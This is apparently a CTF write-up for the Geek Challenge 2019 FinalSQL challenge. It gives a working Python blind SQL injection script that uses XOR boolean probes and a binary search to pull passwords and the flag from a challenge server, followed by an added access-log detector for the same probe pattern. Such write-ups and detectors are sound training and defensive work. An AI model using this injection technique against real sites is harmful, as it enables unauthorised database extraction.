
[Geek Challenge 2019] FinalSQL

Look carefully at the hint it gives and try a blind injection.

import requests
import time

url = 'http://994f19ff-38c7-446e-b200-01d5ce55d8bc.node3.buuoj.cn/search.php'
flag = ''
for i in range(1,250):
   # Binary search over the ASCII range for the i-th character of the result
   low = 32
   high = 128
   mid = (low+high)//2
   while(low<high):
       #payload = 'http://8c7ac1a3-8ac9-4802-ba55-d0463e4683e6.node3.buuoj.cn/search.php?id=1^(ascii(substr(database(),%d,1))=%d)#' %(i,mid)
       payload = url + "?id=1^(ascii(substr((select(group_concat(password))from(F1naI1y)),%d,1))>%d)" %(i,mid)
       res = requests.get(url=payload)

       # 'ERROR' in the response means the comparison was true (character code > mid)
       if 'ERROR' in res.text:
           low = mid+1
       else:
           high = mid
       mid = (low+high)//2
   # The search settles on a boundary value once there are no characters left
   if(mid ==32 or mid ==127):
       break
   flag = flag+chr(mid)
   print(flag)
   # Throttle the requests
   time.sleep(1)


Remember: be sure to go slowly.

It was hidden really deep.

cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,welcom_to_Syclover,cl4y_really_need_a_grilfriend,flag{ddc7e779-690e-4e20-bb90-5cc863fdc71b}
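
From the defender's side, the requests the script above sends leave a recognizable trace in the web server's access log: the same `id` parameter carrying an `ascii(substr(...,pos,1))` comparison again and again with changing position and threshold. The following is an added example, not part of the original post; the log format, the function name `find_blind_sqli`, the `min_probes` threshold and the sample log lines are all assumptions constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# The comparison primitive seen in the payload: ascii(substr(<expr>,<pos>,1)) <op> <n>
PROBE = re.compile(
    r"ascii\s*\(\s*substr\s*\((?P<expr>.+),\s*(?P<pos>\d+)\s*,\s*1\s*\)\s*\)"
    r"\s*[<>=]\s*(?P<val>\d+)", re.I)
# Assumed combined-log-style line: ip - - [ts] "GET <target> HTTP/1.1" status size
LINE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]*\] "GET (?P<target>\S+) [^"]*"')

def find_blind_sqli(lines, param="id", min_probes=5):
    """Return {ip: sorted string positions probed} for clients that sent at
    least min_probes distinct (position, threshold) comparisons in `param`."""
    probes = defaultdict(set)
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue  # not an access-log line in the assumed format
        query = urlsplit(m.group("target")).query
        for value in parse_qs(query).get(param, []):  # parse_qs URL-decodes
            hit = PROBE.search(value)
            if hit:
                probes[m.group("ip")].add(
                    (int(hit.group("pos")), int(hit.group("val"))))
    return {ip: sorted({pos for pos, _ in seen})
            for ip, seen in probes.items() if len(seen) >= min_probes}

# Constructed sample log (documentation IP ranges), not captured traffic.
_Q = ("/search.php?id=1%5E(ascii(substr((select(group_concat(password))"
      "from(F1naI1y)),{p},1))%3E{v})")
SAMPLE_LOG = [
    '198.51.100.20 - - [18/Jul/2021:16:00:01 +0800] '
    '"GET /search.php?id=3 HTTP/1.1" 200 512',
] + [
    f'203.0.113.7 - - [18/Jul/2021:16:00:{s:02d} +0800] '
    f'"GET {_Q.format(p=p, v=v)} HTTP/1.1" 200 498'
    for s, (p, v) in enumerate(
        [(1, 80), (1, 104), (1, 98), (1, 101), (2, 80), (2, 56)], start=2)
]

if __name__ == "__main__":
    for ip, positions in find_blind_sqli(SAMPLE_LOG).items():
        print(f"{ip}: comparison probes against positions {positions}")
```

Because the check counts distinct probes per client rather than request rate, a run throttled to one request per second is flagged the same way as a fast one.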
posted @ 2021-07-18 16:14  探针一号